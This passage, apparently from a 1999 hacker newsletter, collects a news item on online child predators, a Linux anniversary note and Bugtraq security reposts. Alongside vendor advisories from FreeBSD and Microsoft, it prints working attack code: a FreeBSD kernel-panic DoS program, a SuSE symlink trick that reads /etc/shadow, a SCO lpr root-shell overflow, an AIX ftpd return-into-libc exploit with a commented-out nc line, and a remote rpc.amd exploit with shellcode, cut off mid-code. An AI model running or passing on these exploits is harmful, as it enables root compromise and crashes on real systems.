compulsion - you can sometimes lose your way. Being smart may
be protective, but it's by no means a guarantee."
Internet replaces schoolyard
Sex-offender treatment providers and law-enforcement officers
alike say the Internet has made their job much harder.
"Pedophiles don't have to hang around schoolyards with bags of
candy anymore," said Ray Lauer, an FBI agent in Seattle. "They
can just go to an Internet chat room to get what they want."
During the Internet chats, the complaint said, Naughton allegedly
persisted in his requests to meet the girl, though he was repeatedly
asked if he realized he was typing to a 13-year-old and could get
into trouble.
As investigators, Aden said, "We sure make it clear we are
underage, and if they don't want to go forward, that's fine with us.
"Some people do get pangs of conscience and back out. It's good
to see somebody back away. But we still have people - and in
positions of incredible responsibility - who still go ahead."
Seattle Times staff reporters Jack Broom, Helen Jung, Susan
Gilmore, Carol Ostrom and Arthur Santana contributed to
this report.
Copyright © 1999 Seattle Times Company
@HWA
35.0 HAPPY BIRTHDAY TO LINUX
~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Saturday 18th September 1999 on 5:12 pm CET
Yesterday was 8th anniversary of the initial public release of Linux - version 0.01 -
that occurred on the 17th September 1991. As Linus Torvalds said: "Software is like
sex; it's better when it's free", Linux will remain free for distribution.
@HWA
36.0 3com SNMP bug vulnerabilty
~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Re: One more 3Com SNMP vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM
Hi all,
Well spotted. To be more accurate, this bug can be found on
3Com SuperStack II Port Switch Hubs running software version
2.10. The bug disappeared from version 2.12. New software
versions are available at
http://support.3com.com/software/superstack_ii_ps_hub_40_fil
es.htm
Arnaud Bienvenu.
--
Hi,
It seems that 3Com does not pay much atention how its SNMP
is
implemented. In 3Com SuperStack II hubs MIB there's an OID:
.1.3.6.1.4.1.43.10.4.2. Its name decodes to
.iso.org.dod.internet.private.enterprises.a3Com.generic.secu
rity.securityUserTable.
What You need to know that's read-only community and this
OID will give you
entire table of communities (read-write and read-only).
If somebody knows how to contact 3Com with such reports
forward this info
to them. Half an hour exploring 3Com web site i found no
e-mail's (not even
<A HREF="mailto:support@3com.com">support@3com.com</A>).
Amazing...
--
Nerijus Krukauskas Bank of Lithuania
Division head IT department,
Networking division
Tel. +370-2-680731 Zirmunu 151
<A
HREF="mailto:nkrukauskas@lbank.lt">nkrukauskas@lbank.lt</A>
2012 Vilnius, Lithuania
@HWA
37.0 FreeBSD local DoS on network by unpriviledged user using setsockopt()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Local DoS on network by unpriviledged user using setsockopt()
To: BUGTRAQ@SECURITYFOCUS.COM
Recently, I mailed this mailing to a number of people who are concerned
with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
mailing was NOT intended to be made public, but somehow it was. Here is
my original mailing:
--- Forwarded ---
I stumbled across a denial of service attack on FreeBSD systems, where
an unpriviledged user can panic the kernel. Quick and dirty testing
(code attached at the end of this mail) showed OpenBSD is vulnerable
too:
FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
test it on older FreeBSD versions.
OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
The kernel logs one "/bsd: mb_map full" and all processes trying to send
something over the network get stuck waiting in mbuf. Locally the system
continues to function. Tested by a friend.
NetBSD: Not available, but it is highly probable that the affected code
in OpenBSD is from its parent NetBSD.
As far as I'm concerned, this can be handled quietly and without much
haste. Knowledge of this problem is limited and there is absolutely no
intention of publishing this exploit or messages to Bugtraq.
With kind regards,
Sven Berkvens (sven@ilse.nl)
Long time FreeBSD-system administrator
The source code for the program that causes this:
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}
----- End forwarded message -----
@HWA
38.0 BSD:Three ftp daemons in ports vulnerable to attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: [security-officer@FreeBSD.ORG: FreeBSD Security Advisory:
FreeBSD-SA-99:03.ftpd REISSUED]
To: BUGTRAQ@SECURITYFOCUS.COM
[security-officer@FreeBSD.ORG 2.ems Content-Type: text/plain; charset=us-ascii
*** PGP Signature Status: unknown
*** Signer: Unknown, Key ID xBE7497F1
*** Signed: 9/15/99 11:30:30 PM
*** Verified: 9/17/99 1:04:54 PM
*** BEGIN PGP VERIFIED MESSAGE ***
----- Forwarded message from FreeBSD Security Officer <security-officer@FreeBSD.ORG> -----
Delivered-To: freebsd-announce@freebsd.org
Date: Wed, 15 Sep 1999 21:46:28 -0600 (MDT)
From: FreeBSD Security Officer <security-officer@FreeBSD.ORG>
Subject: FreeBSD Security Advisory: FreeBSD-SA-99:03.ftpd REISSUED
Reply-To: security-officer@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk
To: undisclosed-recipients: ;
-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
FreeBSD-SA-99:03 Security Advisory
FreeBSD, Inc.
Topic: Three ftp daemons in ports vulnerable to attack.
Category: ports
Module: wu-ftpd and proftpd
Announced: 1999-09-05
Reissued: 1999-09-15
Affects: FreeBSD 3.2 (and earlier)
FreeBSD-current and -stable before the correction date.
Corrected: FreeBSD-3.3 RELEASE
FreeBSD as of 1999/08/30 for wuftpd only
(Note: there is only one ports tree which is shared with
all FreeBSD branches, so if you are running a -stable
version of FreeBSD you will also be impacted.)
FreeBSD only: NO
Bugtraq Id: proftpd: 612
Patches: NONE
I. Background
wuftpd, beroftpd and proftpd are all optional portions of the system
designed to replace the stock ftpd on a FreeBSD system. They are
written and maintained by third parties and are included in the
FreeBSD ports collection.
II. Problem Description
There are different security problems which can lead to remote root
access in these ports or packages.
The standard ftp daemon which ships with FreeBSD is not impacted by
either of these problems.
III. Impact
Remote users can gain root.
IV. Workaround
Disable the ftp daemon until you can upgrade your system, or use the
stock ftpd that comes with FreeBSD.
V. Solution
Upgrade your wu-ftpd port to the version in the cvs repository after
August 30, 1999. If you are not using the wu-ftpd port, then you
should visit their web site and follow instructions there to patch
your existing version.
beroftpd, which was listed in the original wu-ftpd group's advisory as
having a similar problem, has not been corrected as of September 15,
1999. It will not be in the 3.3 release. The port has been marked
forbidden and will remain so until the security problems have been
corrected. If you are running beroftpd you are encouraged to find if
patches are available for it which corrects these problems before
enabling it on your system.
proftpd, which had different security problems, has not been updated
to a safe version as of September 15, 1999. It will not be in the 3.3
release. It will not be in the 3.3 release. The port has been marked
forbidden and will remain so until the security problems have been
corrected. If you are running proftpd, you are encouraged to find out
if there are patches which correct these problems before reenabling it
on your system.
The previous advisory suggested that any FreeBSD ports version of
proftpd after August 30 had the security problems corrected. This has
proven to not be the case and was the primary reason for reissuing
this advisory. While reissuing the advisory, we added beroftpd since
it shares a code history with wu-ftpd. The original advisory
mistakenly asserted that proftpd also shared a code history with
wuftpd, which is not the case.
VI. Credits and Pointers
The wu-ftpd advisory can be found at
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/2.5.0.Security.Update.asc
=============================================================================
FreeBSD, Inc.
Web Site: http://www.freebsd.org/
Confidential contacts: security-officer@freebsd.org
Security notifications: security-notifications@freebsd.org
Security public discussion: freebsd-security@freebsd.org
PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc
Notice: Any patches in this document may not apply cleanly due to
modifications caused by digital signature or mailer software.
Please reference the URL listed at the top of this document
for original copies of all patches if necessary.
=============================================================================
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface
iQCVAwUBN+BmhFUuHi5z0oilAQFlOAQAiU3kAPurRruiFGfG33OsM3ni86HFpKPZ
Hb9pINkP9Fu8qdKD/JKYYSxCLRhJLoqojSHXXpVvhJUOQx+1RVaiVCVNvZhV0ypx
0M/+VEg1IpusbxkTRbNFE6cUrMwAiHvbZepYp41slTiA2MwDV7cqX1yvv1InGU1z
HSfQSOB/Kfs=
=NPAs
-----END PGP SIGNATURE-----
This is the moderated mailing list freebsd-announce.
The list contains announcements of new FreeBSD capabilities,
important events and project milestones.
See also the FreeBSD Web pages at http://www.freebsd.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-announce" in the body of the message
----- End forwarded message -----
--
Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick
Pine Internet B.V. PGP key ID BE7497F1
Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/
-- Pine Security Digest - http://security.pine.nl/ (Dutch) ----
Excuse of the day: The computer fletely, mouse and all.
*** END PGP VERIFIED MESSAGE ***
@HWA
39.0 Two SuSE 6.2 local root exploits
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Two SuSE 6.2 local root exploits
To: BUGTRAQ@SECURITYFOCUS.COM
Greetings,
/usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
any user to read any file on the system as shown:
susebox:/root # ls -la /usr/bin/pb
uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb
susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or
directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
file or directory
) = 41
_exit(1) = ?
susebox:/root #
---
xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec@susebox:/tmp > pb
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> =
<bin:*:8902:0:10000::::>
Unknown config line : <daemon:*:8902:0:10000::::> =
<lp:*:9473:0:10000::::>
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file
The same scenario for /usr/bin/pg's pg.conf in your cwd. These two
programs also contain numerous buffer overflows and other insecure file
i/o and should obviously lose their suid bits. They cannot operate
correctly without their s-bits unless they are run by root, but no one
besides root will run them anyway. These programs are not worth
patching.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
@HWA
40.0 Microsoft Security Bulletin (MS99-034)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Microsoft Security Bulletin (MS99-034)
To: BUGTRAQ@SECURITYFOCUS.COM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS99-034)
--------------------------------------
Patch Available for "Fragmented IGMP Packet" Vulnerability
Originally Posted: September 03, 1999
Summary
=======
Microsoft has released a patch that eliminates a vulnerability in the TCP/IP
stack implementations of Microsoft(r) Windows(r) 95, Windows 98 and Windows
NT(r) 4.0. Fragmented IGMP packets can cause a variety of problems in
Windows 95 and 98, up to and including causing the machine to crash.
Windows NT 4.0 contains the same vulnerability, but other system mechanisms
make a successful attack much more difficult.
Frequently asked questions regarding this vulnerability can be found at
http://www.microsoft.com/security/bulletins/MS99-034faq.asp
Issue
=====
By sending fragmented IGMP packets to a Windows 95, 98 or Windows NT 4.0
machine, it is possible to disrupt the normal operation of the machine.
This vulnerability primarily affects Windows 95 and 98 machines. Depending
on a variety of factors, sending such packets to a Windows 95 or 98 machine
may elicit behavior ranging from slow performance to crashing.
Windows NT contains the same vulnerability, but other system mechanisms
compensate and make it much more difficult to mount a successful attack.
Affected Software Versions
==========================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0, Enterprise Edition
- Microsoft Windows NT Server 4.0, Terminal Server Edition
Patch Availability
==================
- Windows 95:
This patch will be available shortly
- Windows 98:
http://www.microsoft.com/windows98/downloads/corporate.asp
- Windows NT Workstation 4.0; Windows NT Server 4.0;
Windows NT Server, Enterprise Edition:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa
/NT40/hotfixes-postSP5/IGMP-fix/
- Windows NT Server 4.0, Terminal Server Edition:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa
/NT40TSE/hotfixes-postSP5/IGMP-fix/
NOTE: Line breaks have been inserted into the above URLs for readability.
NOTE: The Windows 95 and 98 patches also will be available via
WindowsUpdate (http://www.microsoft.com/windowsupdate) circa
September 9, 1999.
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-034: Frequently Asked Questions,
http://www.microsoft.com/security/bulletins/MS99-034faq.asp.
- Microsoft Knowledge Base (KB) article Q238329,
Fragmented IGMP Packets may Promote Denial of Service,
http://support.microsoft.com/support/kb/articles/q238/3/29.asp.
(Note: It may take 24 hours from the original posting of this
bulletin for the KB article to be visible.)
- Microsoft Security Advisor web site,
http://www.microsoft.com/security/default.asp.
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- September 03, 1999: Bulletin Created.
----------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/services/bulletin.asp. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
@HWA
41.0 SCO 5.0.5 lpr local root exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: SCO 5.0.5 lpr local root exploit
To: BUGTRAQ@SECURITYFOCUS.COM
Greetings,
There is a hole in SCO 5.0.5, probably 5.0.x, /usr/bin/lpr. Or more
accurately, /usr/lpd/remote/lp, which lpr execs and passes your command
line args on to. This means that while /usr/bin/lpr is sgid lp, we'll
still get a rootshell because /usr/lpd/remote/lp is suid root/sgid
daemon. I haven't looked into the remote angle of this exploit, though
the pathname is hardly encouraging.
FIX: I would recommend a recursive direc
tory sbit-search-and-destroy if
you're running SCO..
-Brock
--- cut ---
/*
* sco_lpr.c - overflows /usr/remote/lpd/lp and gives rootshell
* Tested on SCO 5.0.5+Skunkware98
*
* Compile gcc -o sco_lpr sco_lpr.c
* sco_lpr <offset> <bufsiz>
*
* -Brock Tellier btellier@webley.com
*/
#include <stdlib.h>
#include <stdio.h>
char scoshell[]= /* doble@iname.com */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define LEN 3000
#define NOP 0x90
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[]) {
long int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];
if(argc > 3) {
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
exit(0);
}
else if (argc == 2){
offset=atoi(argv[1]);
}
else if (argc == 3) {
buflen=atoi(argv[2]);
}
else {
offset=1800;
buflen=1500;
}
addr=get_sp();
fprintf(stderr, "SCO 5.0.5 lpr exploit\n");
fprintf(stderr, "Brock Tellier btellier@webley.com\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+1;i<buflen-4;i+=4)
*(int *)&buf[i]=addr+offset;
execl("/usr/bin/lpr", "lpr", "-o", buf, NULL);
exit(0);
}
--- cut ---
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
@HWA
42.0 Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an RS6000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl
# *** Synnergy Networks
# * Description:
#
# Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an
# RS6000. (power)
# This is an return into libc exploit specificly crafted for
# one box and it is very unlikely to work on another box
# * Author:
#
# dvorak (dvorak@synnergy.net)
# Synnergy Networks (c) 1999, http://www.synnergy.net
# * Greets:
#
# Synnergy Networks, Hit2000 crew, Emphyrio, shevek
# * Comments:
#
# A full working exploit will be released later on.
# The addresses point to positions in the program or libraries,
# only the relevant instructions are shown also note that b r0
# is in fact something like mfsbr r0, bsbr or what that is in
# RS6000 assembly.
#
# The final call is to system which needs the following arguments:
# r3 = address of command to execute
# r2 = TOC (what is TOC anyway), I don't know if it does matter but
# we set it anyway (we can so why not do it)
# r1 = SP but this is ok already,
# the rest is free so it seems.
#
# Our route:
# 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228
# 0x10015228: loads r12 with a value from our buffera
# loads r0 with the next address to jump to (0x1001038c)
# and sets r2 to another place in our buffer
# 0x1001038c: sets r3 to a place in the buffer (finally!)
# sets r0 to next address to jump to (0xd00406d4, system(...))
#
# The flow with registers is thus:
# r2 = 0x14(r1)
# r12 = 0x110(r2)
# r0 = 0x0(r12)
# r2 = 0x4(r12)
# r3 = 0x40(r1)
# r12 = 0x3c(r2)
# 0x14(r1) = r12 this is the plave where TOC is stored but it doesn't seem
# to matter
# r0 = 0x0(12)
# r2 = 0x04(r12)
# and of we go...
#
# We set:
# $buf = the buffer on the stack $buf[0] is the first byte in the buffer
# but we will count offsets from 4 (the first 4 bytes is just "CEL " is
# doesn't matter, only the space does (it makes sure the rest of the buffer)
# stays the way it is and isn't converted into lower case
#
# Offsets:
# 0x000: 0x1001038c
# 0x004: buf[0]
# 0x008: this is the place where the address of the systemcall is taken from
# 0xd00406d4 in our case# 0x00c: thi is the address where r2 is loaded
# from just before the call to
# system(..) we set it to the TOC in our program we don't know if it
# matters and if the TOC is constant between hosts
# 0x03c: buf[08]
# 0x110: buf[0]
# 0x204: return address (0x10010150)
# 0x210: buf[0]
# 0x23c: buf[0x240]
# 0x240: "/tmp/sh" or whatever command you want to execute
# r1 points to buf[0x1fc]
#
# I assume the positions in the libraries/program are fixed and that TOC
# either doesn't matter or is fixed to please enlighten me on these topics.
#
# 0x10010150:
# l r2, 0x14(r1)
# b 0x10015228
# 0x10015228:
# l r12, 0x110(r2)
# st r12, 0x14(r1)
# l r0, 0x0(r12)
# l r2, 0x4(r12)
# b r0
# 0x1001038c:
# l r3, 0x40(r1)
# b 0x100136f8
# 0x100136f8:
# l r12, 0x3c(r2)
# st r12, 0x14(r1)
# l r0, 0x0(r12)
# l r2, 0x04(r12)
# *** Synnergy Networks
$bufstart = 0x2ff22724; # this is our first guess
$nop = "\xde\xad\xca\xfe";
$buf = "CEL ";
$buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of
# 'borrowed' code
$buf .= pack ("N", $bufstart); # 4
$buf .= "\xd0\x04\x06\xd4"; # 8 system call..
$buf .= "\xf0\x14\x63\x5c"; # c TOC
$offset = 0x10;
while ($offset < 0x3c) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x008);
$offset += 4;
while ($offset < 0x110) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x204) {
$offset += 4;
$buf .= $nop;
}
$buf .= "\x10\x01\x01\x50";
$offset += 4;
while ($offset < 0x210) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart);
$offset += 4;
while ($offset < 0x23c) {
$offset += 4;
$buf .= $nop;
}
$buf .= pack ("N", $bufstart + 0x240);
$offset += 4;
while ($offset < 0x240) {
$offset += 4;
$buf .= $nop;
}
# this is the command that will be run through system
$buf .= "/tmp/sh";
$buf .= "\n";
# offcourse you should change this .
# open F, "| nc -v -v -n 192.168.2.12 21";
open F, "| od -tx1";
printf F $buf;
close F;
# EOF
@HWA
43.0 SDI AMD remote exploit for RH linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: SDI AMD remote exploit for RH linux
To: BUGTRAQ@SECURITYFOCUS.COM
Here is the exploit for the AMD vulnerability. You may choose to send the
information via UDP or TCP, or even to bypasse the portmap by specifing
the automount port.
------------------------------------
/*
* SDI rpc.AMD automountd remote exploit for RedHat Linux
* Sekure SDI - Brazilian Information Security Team
* by c0nd0r <condor@sekure.org> - Jul/99
*
* AMD doesn't check bounds in the plog() function, so we may
* call the procedure 7 and exploit this vulnerability.
* It has been tested under rh5.2/5.0 but this vulnerability exists in
* all versions.
*
* Greets: jamez, bishop, bahamas, stderr, dumped, paranoia, marty(nordo),
* vader, fcon, slide, corb, soft distortion and specially to
* my sasazita! Also lots of thanks to toxyn.org(frawd,r00t),
* pulhas.org, phibernet, superbofh(seti) and el8.org (duke).
* #uground (brasnet), #sdi(efnet), #(phibernet).
*
* usage: SDIamd -h <host> -c <command> [-p <port>] [-o <offset>]
* where -p <port> will bypass the portmap.
*
* Warning: We take no responsability for the consequences on using this
* tool. DO NOT USE FOR ILICIT ACTIVITIES!
*
* Agradecimentos a todo o pessoal que vem acompanhando a lista brasileira
* de seguranca - BOS-BR <bos-br-request@sekure.org>. Fiquem ligado na
* nova pagina do grupo!
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#define AMQ_PROGRAM ((u_long)300019)
#define AMQ_VERSION ((u_long)1)
#define AMQPROC_MOUNT ((u_long)7)
#define AMQ_STRLEN 1024
#define XDRPROC_T_TYPE xdrproc_t
#define voidp void *
#define NOP 0x90
char shellcode[] =
"\xeb\x31\x5e\x89\x76\xac\x8d\x5e\x08\x89\x5e\xb0"
"\x8d\x5e\x0b\x89\x5e\xb4\x31\xc0\x88\x46\x07\x88"
"\x46\x0a\x88\x46\xab\x89\x46\xb8\xb0\x0b\x89\xf3"
"\x8d\x4e\xac\x8d\x56\xb8\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c ";
//typedef bool_t (*xdrproc_t) __P ((XDR *, __ptr_t, ...));
typedef char *amq_string;
typedef long *time_type;
typedef struct amq_mount_tree amq_mount_tree;
typedef amq_mount_tree *amq_mount_tree_p;
struct amq_mount_tree {
amq_string mt_mountinfo;
amq_string mt_directory;
amq_string mt_mountpoint;
amq_string mt_type;
time_type mt_mounttime;
u_short mt_mountuid;
int mt_getattr;
int mt_lookup;
int mt_readdir;
int mt_readlink;
int mt_statfs;
struct amq_mount_tree *mt_next;
struct amq_mount_tree *mt_child;
};
bool_t
xdr_amq_string(XDR *xdrs, amq_string *objp)
{
if (!xdr_string(xdrs, objp, AMQ_STRLEN)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_time_type(XDR *xdrs, time_type *objp)
{
if (!xdr_long(xdrs, (long *) objp)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_amq_mount_tree(XDR *xdrs, amq_mount_tree *objp)
{
if (!xdr_amq_string(xdrs, &objp->mt_mountinfo)) {
return (FALSE);
}
if (!xdr_amq_string(xdrs, &objp->mt_directory)) {
return (FALSE);
}
if (!xdr_amq_string(xdrs, &objp->mt_mountpoint)) {
return (FALSE);
}
if (!xdr_amq_string(xdrs, &objp->mt_type)) {
return (FALSE);
}
if (!xdr_time_type(xdrs, &objp->mt_mounttime)) {
return (FALSE);
}
if (!xdr_u_short(xdrs, &objp->mt_mountuid)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_getattr)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_lookup)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_readdir)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_readlink)) {
return (FALSE);
}
if (!xdr_int(xdrs, &objp->mt_statfs)) {
return (FALSE);
}
if (!xdr_pointer(xdrs, (char **) &objp->mt_next, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) {
return (FALSE);
}
if (!xdr_pointer(xdrs, (char **) &objp->mt_child, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) {
return (FALSE);
}
return (TRUE);
}
bool_t
xdr_amq_mount_tree_p(XDR *xdrs, amq_mount_tree_p *objp)
{
if (!xdr_pointer(xdrs, (char **) objp, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) {
return (FALSE);
}
return (TRUE);
}
int usage ( char *arg) {
printf ( "Sekure SDI - AMD remote exploit for linux\n");
printf ( "usage: %s -h <host> -c <command> [-o <offset>] [-p <port>] [-u] \n", arg);
printf ( " where: [port] will bypass portmap\n");
printf ( " [-u ] will use udp instead of tcp\n");
exit (0);
}
int *amqproc_mount_1(voidp argp, CLIENT *clnt);
int main ( int argc, char *argv[] ) {
CLIENT *cl;
struct timeval tv;
struct sockaddr_in sa;
struct hostent *he;
char buf[8000], *path = buf, comm[200], *host, *cc;
int sd, res, x, y, offset=0, c, port=0, damn=0, udp=0;
long addr = 0xbffff505;
while ((c = getopt(argc, argv, "h:p:c:o:u")) != -1)
switch (c) {
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'c':
cc = optarg;
break;
case 'o':
offset = atoi ( optarg);
break;
case 'u':
udp = 1;
break;
default:
damn = 1;
break;
}
if (!host || !cc || damn) usage ( argv[0]);
sa.sin_family = AF_INET;
he = gethostbyname ( host);
if (!he) {
if ( (sa.sin_addr.s_addr = inet_addr ( host)) == INADDR_NONE) {
printf ( "unknown host, try again pal!\n");
exit ( 0);
}
} else
bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
sa.sin_port = htons(port);
sd = RPC_ANYSOCK;
tv.tv_sec = 10;
tv.tv_usec = 0;
snprintf ( comm, sizeof(comm), "%s", cc);
if ( strlen(comm) >= 160) {
printf ( "command too long\n");
exit (0);
} else {
comm[strlen(comm)] = ';';
for ( x = strlen(comm); x < 160; x++)
comm[x] = 'A';
}
addr += offset;
for ( x = 0; x < (1001-(strlen(shellcode)+strlen(comm))); x++)
buf[x] = NOP;
for ( y = 0; y < strlen(shellcode); x++, y++)
buf[x] = shellcode[y];
for ( y = 0; y < strlen(comm); x++, y++)
buf[x] = comm[y];
printf ( "SDI automountd remote exploit for linux\n");
printf ( "Host %s \nRET 0x%x \nOFFset %d \n", host, addr, offset);
for ( ; x < 1020; x+=4) {
buf[x ] = (addr & 0x000000ff);
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0xff000000) >> 24;
}
buf[strlen(buf)] = '\0';
if (!udp) {
if ((cl = clnttcp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, &sd, 0, 0)) ==
NULL)
{
clnt_pcreateerror("clnt_create");
exit (-1);
}
} else {
if ((cl = clntudp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, tv, &sd)) ==
NULL)
{
clnt_pcreateerror("clnt_create");
exit (-1);
}
}
printf ( "PORT %d \n", ntohs(sa.sin_port));
printf ( "Command: %s \n", cc);
amqproc_mount_1 (&path, cl);
clnt_destroy ( cl);
}
int *
amqproc_mount_1(voidp argp, CLIENT *clnt)
{
static int res;
struct timeval TIMEOUT = {10, 0};
memset((char *) &res, 0, sizeof(res));
if (clnt_call(clnt, AMQPROC_MOUNT, (XDRPROC_T_TYPE) xdr_amq_string, argp,
